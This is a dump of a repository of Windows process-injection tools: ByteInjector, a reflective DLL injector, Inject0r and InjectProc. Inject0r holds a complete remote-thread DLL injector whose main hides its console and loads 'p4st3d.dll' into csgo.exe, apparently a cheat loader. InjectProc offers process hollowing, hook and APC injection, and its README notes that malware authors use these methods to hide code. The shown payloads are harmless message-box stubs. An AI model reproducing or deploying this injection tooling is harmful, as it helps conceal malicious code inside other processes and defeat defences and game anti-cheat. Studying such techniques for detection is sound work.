i++; 70 | } 71 | 72 | return p; 73 | } 74 | 75 | const char* ErrorUtil::asString(Error e) { 76 | return findPackedString(errorMessages, e, kErrorCount); 77 | } 78 | #endif // ASMJIT_DISABLE_NAMES 79 | 80 | } // asmjit namespace 81 | 82 | // [Api-End] 83 | #include "../apiend.h" 84 | -------------------------------------------------------------------------------- /BlackBone/contrib/AsmJit/base/globals.cpp: -------------------------------------------------------------------------------- 1 | // [AsmJit] 2 | // Complete x86/x64 JIT and Remote Assembler for C++. 3 | // 4 | // [License] 5 | // Zlib - See LICENSE.md file in the package. 6 | 7 | // [Export] 8 | #define ASMJIT_EXPORTS 9 | 10 | // [Dependencies - AsmJit] 11 | #include "../base/globals.h" 12 | 13 | // [Api-Begin] 14 | #include "../apibegin.h" 15 | 16 | namespace asmjit { 17 | 18 | // ============================================================================ 19 | // [asmjit::Assert] 20 | // ============================================================================ 21 | 22 | void assertionFailed(const char* exp, const char* file, int line) { 23 | ::fprintf(stderr, "Assertion failed: %s\n, file %s, line %d\n", exp, file, line); 24 | ::abort(); 25 | } 26 | 27 | } // asmjit namespace 28 | 29 | // [Api-End] 30 | #include "../apiend.h" 31 | -------------------------------------------------------------------------------- /BlackBone/contrib/AsmJit/base/operand.cpp: -------------------------------------------------------------------------------- 1 | // [AsmJit] 2 | // Complete x86/x64 JIT and Remote Assembler for C++. 3 | // 4 | // [License] 5 | // Zlib - See LICENSE.md file in the package. 6 | 7 | // [Export] 8 | #define ASMJIT_EXPORTS 9 | 10 | // [Dependencies - AsmJit] 11 | #include "../base/globals.h" 12 | 13 | // [Api-Begin] 14 | #include "../apibegin.h" 15 | 16 | namespace asmjit { 17 | 18 | // ============================================================================ 19 | // [asmjit::Operand] 20 | // ============================================================================ 21 | 22 | // Prevent static initialization. 23 | struct Operand { 24 | uint8_t op; 25 | uint8_t size; 26 | uint8_t reserved_2_1; 27 | uint8_t reserved_3_1; 28 | uint32_t id; 29 | uint64_t reserved_8_8; 30 | }; 31 | 32 | ASMJIT_VAR const Operand noOperand; 33 | const Operand noOperand = { 0, 0, 0, 0, kInvalidValue, 0 }; 34 | 35 | } // asmjit namespace 36 | 37 | // [Api-End] 38 | #include "../apiend.h" 39 | -------------------------------------------------------------------------------- /BlackBone/contrib/AsmJit/host.h: -------------------------------------------------------------------------------- 1 | // [AsmJit] 2 | // Complete x86/x64 JIT and Remote Assembler for C++. 3 | // 4 | // [License] 5 | // Zlib - See LICENSE.md file in the package. 6 | 7 | // [Guard] 8 | #ifndef _ASMJIT_HOST_H 9 | #define _ASMJIT_HOST_H 10 | 11 | // [Dependencies - Core] 12 | #include "base.h" 13 | 14 | // ============================================================================ 15 | // [asmjit::host - X86 / X64] 16 | // ============================================================================ 17 | 18 | #if defined(ASMJIT_HOST_X86) || defined(ASMJIT_HOST_X64) 19 | #include "x86.h" 20 | 21 | namespace asmjit { 22 | 23 | // Define `asmjit::host` namespace wrapping `asmjit::x86`. 24 | namespace host { using namespace ::asmjit::x86; } 25 | 26 | // Define host assembler. 27 | typedef X86Assembler HostAssembler; 28 | 29 | // Define host operands. 30 | typedef X86GpReg GpReg; 31 | typedef X86FpReg FpReg; 32 | typedef X86MmReg MmReg; 33 | typedef X86XmmReg XmmReg; 34 | typedef X86YmmReg YmmReg; 35 | typedef X86SegReg SegReg; 36 | typedef X86Mem Mem; 37 | 38 | // Define host utilities. 39 | typedef X86CpuInfo HostCpuInfo; 40 | 41 | // Define host compiler and related. 42 | #if !defined(ASMJIT_DISABLE_COMPILER) 43 | typedef X86Compiler HostCompiler; 44 | typedef X86CallNode HostCallNode; 45 | typedef X86FuncDecl HostFuncDecl; 46 | typedef X86FuncNode HostFuncNode; 47 | 48 | typedef X86GpVar GpVar; 49 | typedef X86MmVar MmVar; 50 | typedef X86XmmVar XmmVar; 51 | typedef X86YmmVar YmmVar; 52 | #endif // !ASMJIT_DISABLE_COMPILER 53 | 54 | } // asmjit namespace 55 | 56 | #endif // ASMJIT_HOST_X86 || ASMJIT_HOST_X64 57 | 58 | // [Guard] 59 | #endif // _ASMJIT_HOST_H 60 | -------------------------------------------------------------------------------- /ByteInjector/icon.ico: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rootm0s/Injectors/7c3b6f9a1b5ccb11d09c893da0dfbb95eefb006e/ByteInjector/icon.ico -------------------------------------------------------------------------------- /ByteInjector/injector.h: -------------------------------------------------------------------------------- 1 | #ifndef INC_INJECTOR 2 | #define INC_INJECTOR 3 | 4 | #include 5 | #include 6 | #include 7 | #include 8 | #include 9 | #include 10 | 11 | class CInjector { 12 | enum { CREATE_THREAD_ACCESS = (PROCESS_CREATE_THREAD | PROCESS_QUERY_INFORMATION | 13 | PROCESS_QUERY_LIMITED_INFORMATION | PROCESS_VM_OPERATION | 14 | PROCESS_VM_WRITE | PROCESS_VM_READ) }; 15 | 16 | typedef std::map ModuleMap_t; // Map of all injected modules (by name) in a process 17 | 18 | struct Process_t { // Structure to describe a process 19 | HANDLE hProc; // Process handle 20 | std::wstring name; // eg. notepad.exe 21 | ModuleMap_t modules; // All injected modules 22 | }; 23 | 24 | typedef std::map ProcessMap_t; // Map (by name) of processes with injected dll's 25 | 26 | public: 27 | typedef std::list ProcessList_t; // List of all process names 28 | 29 | public: 30 | CInjector(); 31 | ~CInjector(); 32 | 33 | int Inject(std::wstring dllPath, std::wstring processName, DWORD pId = 0); 34 | int InjectAuto(std::wstring dllPath, std::wstring processPath); 35 | int Unload(std::wstring dllName, std::wstring processName); 36 | int RefreshProcessList(); 37 | ProcessList_t GetProcessList(); 38 | 39 | private: 40 | DWORD GetProcessIdByName(std::wstring processName); 41 | std::wstring StripPath(std::wstring filePath); 42 | std::wstring StripFile(std::wstring fullPath); 43 | int SetDebugPrivilege(); 44 | 45 | static ProcessMap_t processes; 46 | static ProcessList_t processNames; 47 | 48 | 49 | }; 50 | 51 | #endif -------------------------------------------------------------------------------- /ByteInjector/res.rc: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include "resource.h" 5 | 6 | 7 | IDI_MAIN_ICON ICON "icon.ico" 8 | 9 | 10 | 11 | LANGUAGE LANG_ENGLISH, SUBLANG_ENGLISH_US 12 | IDD_DIALOG1 DIALOG 0, 0, 260, 185 13 | STYLE DS_3DLOOK | DS_CENTER | DS_SHELLFONT | WS_VISIBLE | WS_BORDER | WS_CAPTION | WS_DLGFRAME | WS_GROUP | WS_SYSMENU 14 | CAPTION "ByteInjector" 15 | FONT 8, "Arial" 16 | BEGIN 17 | EDITTEXT IDC_EDIT_DLL, 25, 15, 225, 14, ES_AUTOHSCROLL 18 | LTEXT "Dll to inject:", IDC_STATIC, 10, 5, 39, 8, SS_LEFT 19 | LTEXT "Target process:", IDC_STATIC, 10, 35, 52, 8, SS_LEFT 20 | LISTBOX IDC_LIST_PROCESSES, 10, 45, 240, 75, WS_TABSTOP | WS_VSCROLL | LBS_NOINTEGRALHEIGHT | LBS_NOTIFY 21 | PUSHBUTTON "Refresh", IDC_BTN_REFRESH, 10, 155, 50, 14 22 | PUSHBUTTON "...", IDC_BTN_DLL, 10, 15, 13, 14 23 | PUSHBUTTON "Attach", IDC_BTN_INJECT, 200, 155, 50, 14 24 | PUSHBUTTON "Detach", IDC_BTN_UNLOAD, 145, 155, 50, 14 25 | AUTOCHECKBOX "Create target process and auto inject", IDC_CBX_AUTOINJECT, 10, 123, 135, 10 26 | PUSHBUTTON "...", IDC_BTN_PROCESS, 236, 134, 13, 14, WS_DISABLED 27 | EDITTEXT IDC_EDIT_PROCESS, 10, 135, 225, 14, WS_DISABLED | ES_AUTOHSCROLL 28 | END 29 | 30 | 31 | 32 | -------------------------------------------------------------------------------- /ByteInjector/resource.h: -------------------------------------------------------------------------------- 1 | #ifndef IDC_STATIC 2 | #define IDC_STATIC (-1) 3 | #endif 4 | 5 | #define IDD_DIALOG1 100 6 | #define IDI_MAIN_ICON 101 7 | #define IDC_BTN_INJECT 1000 8 | #define IDC_EDIT_PROCESS 1002 9 | #define IDC_BTN_UNLOAD 1008 10 | #define IDC_BTN_REFRESH 1009 11 | #define IDC_BTN_DLL 1010 12 | #define IDC_EDIT_DLL 1011 13 | #define IDC_LIST_PROCESSES 1012 14 | #define IDC_BTN_PROCESS 1014 15 | #define IDC_CBX_AUTOINJECT 1015 16 | 17 | 18 | 19 | -------------------------------------------------------------------------------- /ByteInjector/system.cpp: -------------------------------------------------------------------------------- 1 | #include "System.h" 2 | 3 | namespace System { 4 | 5 | std::wstring GetSystemError() 6 | { 7 | std::wstring result; 8 | 9 | wchar_t lpMsgBuf[500] = {0}; 10 | FormatMessageW( 11 | FORMAT_MESSAGE_FROM_SYSTEM | 12 | FORMAT_MESSAGE_IGNORE_INSERTS, 13 | NULL, 14 | GetLastError(), 15 | MAKELANGID(LANG_NEUTRAL, SUBLANG_DEFAULT), // Default language 16 | lpMsgBuf, 17 | sizeof(lpMsgBuf), 18 | NULL 19 | ); 20 | 21 | result = lpMsgBuf; 22 | LocalFree(lpMsgBuf); 23 | 24 | return result; 25 | } 26 | 27 | int SetDebugPrivilege() 28 | { 29 | TOKEN_PRIVILEGES tp; 30 | HANDLE hToken; 31 | LUID luid; 32 | 33 | if(!OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES|TOKEN_QUERY, &hToken )) 34 | return 0; 35 | 36 | if(!LookupPrivilegeValueW(L"", L"SeDebugPrivilege", &luid)) 37 | return 0; 38 | 39 | tp.PrivilegeCount = 1; 40 | tp.Privileges[0].Luid = luid; 41 | tp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED; 42 | 43 | return AdjustTokenPrivileges(hToken, FALSE, &tp, sizeof(TOKEN_PRIVILEGES), NULL, NULL ); 44 | } 45 | 46 | } -------------------------------------------------------------------------------- /ByteInjector/system.h: -------------------------------------------------------------------------------- 1 | #ifndef INC_SYSTEM 2 | #define INC_SYSTEM 3 | 4 | #include 5 | #include 6 | 7 | namespace System { 8 | 9 | std::wstring GetSystemError(); 10 | int SetDebugPrivilege(); 11 | 12 | } 13 | 14 | #endif -------------------------------------------------------------------------------- /ImprovedReflectiveDLLInjection/LICENSE.txt: -------------------------------------------------------------------------------- 1 | Copyright (c) 2015, Dan Staples 2 | 3 | Copyright (c) 2011, Stephen Fewer of Harmony Security (www.harmonysecurity.com) 4 | All rights reserved. 5 | 6 | Redistribution and use in source and binary forms, with or without modification, are permitted 7 | provided that the following conditions are met: 8 | 9 | * Redistributions of source code must retain the above copyright notice, this list of 10 | conditions and the following disclaimer. 11 | 12 | * Redistributions in binary form must reproduce the above copyright notice, this list of 13 | conditions and the following disclaimer in the documentation and/or other materials provided 14 | with the distribution. 15 | 16 | * Neither the name of Harmony Security nor the names of its contributors may be used to 17 | endorse or promote products derived from this software without specific prior written permission. 18 | 19 | THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR 20 | IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND 21 | FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR 22 | CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR 23 | CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR 24 | SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY 25 | THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR 26 | OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE 27 | POSSIBILITY OF SUCH DAMAGE. -------------------------------------------------------------------------------- /ImprovedReflectiveDLLInjection/dll/reflective_dll.sln: -------------------------------------------------------------------------------- 1 |  2 | Microsoft Visual Studio Solution File, Format Version 10.00 3 | # Visual C++ Express 2008 4 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "reflective_dll", "reflective_dll.vcproj", "{3A371EBD-EEE1-4B2A-88B9-93E7BABE0949}" 5 | EndProject 6 | Global 7 | GlobalSection(SolutionConfigurationPlatforms) = preSolution 8 | Debug|Win32 = Debug|Win32 9 | Release|Win32 = Release|Win32 10 | EndGlobalSection 11 | GlobalSection(ProjectConfigurationPlatforms) = postSolution 12 | {3A371EBD-EEE1-4B2A-88B9-93E7BABE0949}.Debug|Win32.ActiveCfg = Release|Win32 13 | {3A371EBD-EEE1-4B2A-88B9-93E7BABE0949}.Debug|Win32.Build.0 = Release|Win32 14 | {3A371EBD-EEE1-4B2A-88B9-93E7BABE0949}.Release|Win32.ActiveCfg = Release|Win32 15 | {3A371EBD-EEE1-4B2A-88B9-93E7BABE0949}.Release|Win32.Build.0 = Release|Win32 16 | EndGlobalSection 17 | GlobalSection(SolutionProperties) = preSolution 18 | HideSolutionNode = FALSE 19 | EndGlobalSection 20 | EndGlobal 21 | -------------------------------------------------------------------------------- /ImprovedReflectiveDLLInjection/dll/reflective_dll.vcxproj.filters: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF} 6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx 7 | 8 | 9 | {93995380-89BD-4b04-88EB-625FBE52EBFB} 10 | h;hpp;hxx;hm;inl;inc;xsd 11 | 12 | 13 | 14 | 15 | Source Files 16 | 17 | 18 | Source Files 19 | 20 | 21 | Source Files 22 | 23 | 24 | 25 | 26 | Header Files 27 | 28 | 29 | Header Files 30 | 31 | 32 | -------------------------------------------------------------------------------- /ImprovedReflectiveDLLInjection/dll/src/MyFunction.c: -------------------------------------------------------------------------------- 1 | #include "ReflectiveLoader.h" 2 | #include 3 | 4 | DLLEXPORT BOOL 5 | MyFunction(LPVOID lpUserdata, DWORD nUserdataLen) 6 | { 7 | LPSTR str = malloc(32 + nUserdataLen); 8 | sprintf_s(str, 32 + nUserdataLen, "Hello from MyFunction: %s!", lpUserdata); 9 | MessageBoxA(NULL, str, (LPCSTR)lpUserdata, MB_OK); 10 | free(str); 11 | return TRUE; 12 | } 13 | -------------------------------------------------------------------------------- /ImprovedReflectiveDLLInjection/dll/src/ReflectiveDll.c: -------------------------------------------------------------------------------- 1 | //===============================================================================================// 2 | // This is a stub for the actuall functionality of the DLL. 3 | //===============================================================================================// 4 | #include "ReflectiveLoader.h" 5 | 6 | // You can use this value as a pseudo hinstDLL value (defined and set via ReflectiveLoader.c) 7 | extern HINSTANCE hAppInstance; 8 | //===============================================================================================// 9 | BOOL WINAPI DllMain( HINSTANCE hinstDLL, DWORD dwReason, LPVOID lpReserved ) 10 | { 11 | BOOL bReturnValue = TRUE; 12 | switch( dwReason ) 13 | { 14 | case DLL_QUERY_HMODULE: 15 | if( lpReserved != NULL ) 16 | *(HMODULE *)lpReserved = hAppInstance; 17 | break; 18 | case DLL_PROCESS_ATTACH: 19 | hAppInstance = hinstDLL; 20 | MessageBoxA( NULL, "Hello from DllMain!", "Reflective Dll Injection", MB_OK ); 21 | break; 22 | case DLL_PROCESS_DETACH: 23 | case DLL_THREAD_ATTACH: 24 | case DLL_THREAD_DETACH: 25 | break; 26 | } 27 | return bReturnValue; 28 | } -------------------------------------------------------------------------------- /ImprovedReflectiveDLLInjection/hashcalc/hashcalc.c: -------------------------------------------------------------------------------- 1 | // Copyright (c) 2015, Dan Staples 2 | 3 | #include 4 | #include 5 | #include 6 | 7 | #define HASH_KEY 13 8 | #pragma intrinsic( _rotr ) 9 | __forceinline DWORD ror(DWORD d) { return _rotr(d, HASH_KEY); } 10 | __forceinline DWORD hash(char * c, BOOL bWide) 11 | { 12 | register DWORD h = 0; 13 | do { 14 | h = ror(h); 15 | h += *c++; 16 | if (bWide) { 17 | h = ror(h); 18 | h += *c; 19 | } 20 | } while (*++c); 21 | return h; 22 | } 23 | 24 | int _tmain(int argc, _TCHAR *argv[]) 25 | { 26 | if (argc != 2 && argc != 3) { 27 | printf("Usage: %s [-u] \n", argv[0]); 28 | return 1; 29 | } 30 | if (argc == 3 && _tcscmp(argv[1], L"-u") == 0) 31 | printf("0x%x\n", hash((char*)argv[2], TRUE)); 32 | else 33 | printf("0x%x\n", hash((char*)argv[(argc == 3) ? 2 : 1], FALSE)); 34 | return 0; 35 | } 36 | 37 | -------------------------------------------------------------------------------- /ImprovedReflectiveDLLInjection/hashcalc/hashcalc.vcxproj.filters: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF} 6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx 7 | 8 | 9 | {93995380-89BD-4b04-88EB-625FBE52EBFB} 10 | h;hh;hpp;hxx;hm;inl;inc;xsd 11 | 12 | 13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} 14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms 15 | 16 | 17 | 18 | 19 | Source Files 20 | 21 | 22 | -------------------------------------------------------------------------------- /ImprovedReflectiveDLLInjection/inject/inject.sln: -------------------------------------------------------------------------------- 1 |  2 | Microsoft Visual Studio Solution File, Format Version 10.00 3 | # Visual C++ Express 2008 4 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "inject", "inject.vcproj", "{EEF3FD41-05D8-4A07-8434-EF5D34D76335}" 5 | EndProject 6 | Global 7 | GlobalSection(SolutionConfigurationPlatforms) = preSolution 8 | Debug|Win32 = Debug|Win32 9 | Release|Win32 = Release|Win32 10 | EndGlobalSection 11 | GlobalSection(ProjectConfigurationPlatforms) = postSolution 12 | {EEF3FD41-05D8-4A07-8434-EF5D34D76335}.Debug|Win32.ActiveCfg = Release|Win32 13 | {EEF3FD41-05D8-4A07-8434-EF5D34D76335}.Debug|Win32.Build.0 = Release|Win32 14 | {EEF3FD41-05D8-4A07-8434-EF5D34D76335}.Release|Win32.ActiveCfg = Release|Win32 15 | {EEF3FD41-05D8-4A07-8434-EF5D34D76335}.Release|Win32.Build.0 = Release|Win32 16 | EndGlobalSection 17 | GlobalSection(SolutionProperties) = preSolution 18 | HideSolutionNode = FALSE 19 | EndGlobalSection 20 | EndGlobal 21 | -------------------------------------------------------------------------------- /ImprovedReflectiveDLLInjection/inject/inject.vcxproj.filters: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF} 6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx 7 | 8 | 9 | {93995380-89BD-4b04-88EB-625FBE52EBFB} 10 | h;hpp;hxx;hm;inl;inc;xsd 11 | 12 | 13 | 14 | 15 | Source Files 16 | 17 | 18 | Source Files 19 | 20 | 21 | Source Files 22 | 23 | 24 | 25 | 26 | Header Files 27 | 28 | 29 | Header Files 30 | 31 | 32 | Header Files 33 | 34 | 35 | -------------------------------------------------------------------------------- /Inject0r/injector.cpp: -------------------------------------------------------------------------------- 1 | #include "injector.h" 2 | 3 | bool FindProcessByName(string strProcessname, DWORD &_dwProcessID) 4 | { 5 | std::wstring szTempName = std::wstring(strProcessname.begin(), strProcessname.end()); 6 | const wchar_t* wszName = szTempName.c_str(); 7 | 8 | HANDLE hSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, NULL); 9 | PROCESSENTRY32 ProcEntry; 10 | ProcEntry.dwSize = sizeof(ProcEntry); 11 | 12 | do 13 | if (!wcscmp(ProcEntry.szExeFile, wszName)) 14 | { 15 | CloseHandle(hSnapshot); 16 | _dwProcessID = ProcEntry.th32ProcessID; 17 | return true; 18 | } 19 | while (Process32Next(hSnapshot, &ProcEntry)); 20 | 21 | return false; 22 | } 23 | 24 | bool Injector::Inject(string strProcessName, string strDLLPath) 25 | { 26 | DWORD dwProcessID, dwMemSize; 27 | HANDLE hProcess; 28 | LPVOID lpRemoteMemory, lpLoadLibrary; 29 | char szPath[MAX_PATH]; 30 | 31 | if (!FindProcessByName(strProcessName, dwProcessID)) 32 | return false; 33 | 34 | GetFullPathNameA(strDLLPath.c_str(), MAX_PATH, szPath, NULL); 35 | 36 | if (_access(szPath, 0) != 0) 37 | return false; 38 | 39 | dwMemSize = strlen(szPath) + 1; 40 | hProcess = OpenProcess(PROCESS_VM_OPERATION | PROCESS_VM_WRITE | PROCESS_CREATE_THREAD, FALSE, dwProcessID); 41 | lpRemoteMemory = VirtualAllocEx(hProcess, NULL, dwMemSize, MEM_COMMIT, PAGE_READWRITE); 42 | WriteProcessMemory(hProcess, lpRemoteMemory, (LPCVOID)szPath, dwMemSize, NULL); 43 | lpLoadLibrary = GetProcAddress(GetModuleHandleA("Kernel32.dll"), "LoadLibraryA"); 44 | 45 | if (CreateRemoteThread(hProcess, NULL, NULL, (LPTHREAD_START_ROUTINE)lpLoadLibrary, lpRemoteMemory, NULL, NULL)) 46 | { 47 | VirtualFreeEx( hProcess, ( LPVOID ) lpRemoteMemory, 0, MEM_RELEASE ); 48 | CloseHandle(hProcess); 49 | return true; 50 | } 51 | else 52 | return false; 53 | } -------------------------------------------------------------------------------- /Inject0r/injector.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | #include 4 | #include 5 | #include 6 | #include 7 | #include 8 | #include 9 | 10 | using namespace std; 11 | 12 | namespace Injector 13 | { 14 | extern bool Inject(string strProcessName, string strDLLPath); 15 | } -------------------------------------------------------------------------------- /Inject0r/main.cpp: -------------------------------------------------------------------------------- 1 | #include "injector.h" 2 | 3 | int WINAPI WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, 4 | LPSTR lpCmdLine, int nCmdShow) { 5 | ShowWindow(GetConsoleWindow(), SW_HIDE); 6 | Injector::Inject("csgo.exe", "p4st3d.dll"); 7 | 8 | return 0; 9 | } -------------------------------------------------------------------------------- /InjectProc/InjectProc - Process Injection Techniques.sln: -------------------------------------------------------------------------------- 1 |  2 | Microsoft Visual Studio Solution File, Format Version 12.00 3 | # Visual Studio 15 4 | VisualStudioVersion = 15.0.26430.6 5 | MinimumVisualStudioVersion = 10.0.40219.1 6 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "InjectProc", "InjectProc\InjectProc.vcxproj", "{D9F15158-3F31-4587-9FF0-660D71EB5483}" 7 | EndProject 8 | Global 9 | GlobalSection(SolutionConfigurationPlatforms) = preSolution 10 | Debug|x64 = Debug|x64 11 | Debug|x86 = Debug|x86 12 | Release|x64 = Release|x64 13 | Release|x86 = Release|x86 14 | EndGlobalSection 15 | GlobalSection(ProjectConfigurationPlatforms) = postSolution 16 | {D9F15158-3F31-4587-9FF0-660D71EB5483}.Debug|x64.ActiveCfg = Debug|x64 17 | {D9F15158-3F31-4587-9FF0-660D71EB5483}.Debug|x64.Build.0 = Debug|x64 18 | {D9F15158-3F31-4587-9FF0-660D71EB5483}.Debug|x86.ActiveCfg = Debug|Win32 19 | {D9F15158-3F31-4587-9FF0-660D71EB5483}.Debug|x86.Build.0 = Debug|Win32 20 | {D9F15158-3F31-4587-9FF0-660D71EB5483}.Release|x64.ActiveCfg = Release|x64 21 | {D9F15158-3F31-4587-9FF0-660D71EB5483}.Release|x64.Build.0 = Release|x64 22 | {D9F15158-3F31-4587-9FF0-660D71EB5483}.Release|x86.ActiveCfg = Release|Win32 23 | {D9F15158-3F31-4587-9FF0-660D71EB5483}.Release|x86.Build.0 = Release|Win32 24 | EndGlobalSection 25 | GlobalSection(SolutionProperties) = preSolution 26 | HideSolutionNode = FALSE 27 | EndGlobalSection 28 | EndGlobal 29 | -------------------------------------------------------------------------------- /InjectProc/InjectProc/InjectProc.vcxproj.filters: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF} 6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx 7 | 8 | 9 | {93995380-89BD-4b04-88EB-625FBE52EBFB} 10 | h;hh;hpp;hxx;hm;inl;inc;xsd 11 | 12 | 13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} 14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms 15 | 16 | 17 | 18 | 19 | Source Files 20 | 21 | 22 | Source Files 23 | 24 | 25 | 26 | 27 | Header Files 28 | 29 | 30 | -------------------------------------------------------------------------------- /InjectProc/InjectProc/injection.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | #include 3 | #include 4 | #include 5 | #include 6 | #include 7 | using namespace std; 8 | 9 | 10 | BOOL FindProcess(PCWSTR exeName, DWORD& pid, vector& tids); 11 | 12 | BOOL Dll_Injection(TCHAR *dll_name, TCHAR processname[]); 13 | BOOL ProcessReplacement(TCHAR* target, wstring inj_exe); 14 | BOOL HookInjection(TCHAR target[], TCHAR *dll_name); 15 | BOOL APCinjection(TCHAR target[], TCHAR *dll_name); 16 | 17 | // https://msdn.microsoft.com/en-us/library/windows/desktop/ms684280(v=vs.85).aspx 18 | typedef NTSTATUS(WINAPI* _NtQueryInformationProcess)( 19 | _In_ HANDLE ProcessHandle, 20 | _In_ PROCESSINFOCLASS ProcessInformationClass, 21 | _Out_ PVOID ProcessInformation, 22 | _In_ ULONG ProcessInformationLength, 23 | _Out_opt_ PULONG ReturnLength 24 | ); 25 | 26 | // https://msdn.microsoft.com/en-us/library/windows/hardware/ff567119(v=vs.85).aspx 27 | typedef NTSTATUS(WINAPI* _ZwUnmapViewOfSection)( 28 | _In_ HANDLE ProcessHandle, 29 | _In_opt_ PVOID BaseAddress 30 | ); 31 | 32 | typedef struct BASE_RELOCATION_BLOCK { 33 | DWORD PageAddress; 34 | DWORD BlockSize; 35 | } BASE_RELOCATION_BLOCK, *PBASE_RELOCATION_BLOCK; 36 | 37 | typedef struct BASE_RELOCATION_ENTRY { 38 | USHORT Offset : 12; 39 | USHORT Type : 4; 40 | } BASE_RELOCATION_ENTRY, *PBASE_RELOCATION_ENTRY; 41 | 42 | struct PE_FILE 43 | { 44 | size_t size_ids{}; 45 | size_t size_dos_stub{}; 46 | size_t size_inh32{}; 47 | size_t size_ish{}; 48 | size_t size_sections{}; 49 | IMAGE_DOS_HEADER ids; 50 | std::vector MS_DOS_STUB; 51 | IMAGE_NT_HEADERS64 inh32; 52 | std::vector ish; 53 | std::vector> Sections; 54 | void set_sizes(size_t, size_t, size_t, size_t, size_t); 55 | }; 56 | 57 | struct LOADED_IMAGE64 58 | { 59 | PIMAGE_NT_HEADERS64 FileHeader; 60 | ULONG NumberOfSections; 61 | PIMAGE_SECTION_HEADER Sections; 62 | }; -------------------------------------------------------------------------------- /InjectProc/InjectProc/main.cpp: -------------------------------------------------------------------------------- 1 | #include 2 | #include "Injection.h" 3 | #include 4 | #include 5 | #include 6 | 7 | int main(int argc, char* argv[]) 8 | { 9 | USES_CONVERSION; 10 | if (argc < 2) 11 | { 12 | std::cout << "Usage: ./InjectProc.exe \n\ 13 | Example:\n\ 14 | ./InjectProc.exe dll_inj path/to/dll.dll notepad.exe\n\ 15 | ./InjectProc.exe proc_rpl path/to/target/exe path/to/exe\n\ 16 | ./InjectProc.exe hook path/to/target/exe path/to//dll\n\ 17 | ./InjectProc.exe APC target/proc/name path/to/dll\n\ 18 | "; 19 | return EXIT_FAILURE; 20 | } 21 | 22 | string mode = argv[1]; 23 | if (mode == "dll_inj") 24 | Dll_Injection(A2T(argv[2]), A2T(argv[3])); 25 | else if (mode == "proc_rpl") 26 | ProcessReplacement(A2T(argv[2]), A2T(argv[3])); 27 | else if (mode == "hook") 28 | // Windows hooks can be considered one of the most powerful features of Windows. 29 | // With them, you can trap events that will occur, either in your own process or in other processes. 30 | // By "hooking", you tell Windows about a function, filter function also called hook procedure, 31 | // that will be called everytime an event you're interested in occurs. 32 | HookInjection(A2T(argv[2]), A2T(argv[3])); // Inject DLL into remote process 33 | else if (mode == "APC") 34 | APCinjection(A2T(argv[2]), A2T(argv[3])); 35 | else { 36 | std::cout << "Incorrect mode\n"; 37 | return EXIT_FAILURE; 38 | } 39 | 40 | return EXIT_SUCCESS; 41 | } -------------------------------------------------------------------------------- /InjectProc/InjectProc/test_files/mbox.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rootm0s/Injectors/7c3b6f9a1b5ccb11d09c893da0dfbb95eefb006e/InjectProc/InjectProc/test_files/mbox.dll -------------------------------------------------------------------------------- /InjectProc/InjectProc/test_files/mbox.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rootm0s/Injectors/7c3b6f9a1b5ccb11d09c893da0dfbb95eefb006e/InjectProc/InjectProc/test_files/mbox.exe -------------------------------------------------------------------------------- /InjectProc/README.md: -------------------------------------------------------------------------------- 1 | # InjectProc 2 | 3 | Process injection is a very popular method to hide malicious behavior of code and are heavily used by malware authors. 4 | 5 | There are several techniques, which are commonly used: 6 | DLL injection, process replacement (a.k.a process hollowing), hook injection and APC injection. 7 | 8 | Most of them use same Windows API functions: 9 | OpenProcess, VirtualAllocEx, WriteProcessMemory, for detailed information about those functions, use MSDN. 10 | 11 | ## DLL injection: 12 | * Open target process. 13 | * Allocate space. 14 | * Write code into the remote process. 15 | * Execute the remote code. 16 | 17 | ## Process replacement: 18 | * Create target process and suspend it. 19 | * Unmap from memory. 20 | * Allocate space. 21 | * Write headers and sections into the remote process. 22 | * Resume remote thread. 23 | 24 | ## Hook 